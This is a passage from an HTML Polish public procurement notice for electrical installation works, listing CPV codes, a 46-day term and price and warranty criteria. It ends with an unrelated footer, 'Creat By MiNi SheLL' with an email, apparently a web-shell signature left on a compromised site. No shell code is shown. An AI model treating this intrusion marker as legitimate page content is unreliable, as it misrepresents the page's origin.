CPV - 45311000 - 0 	(roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.20.00-3, 45.33.10.00-6, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 46.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com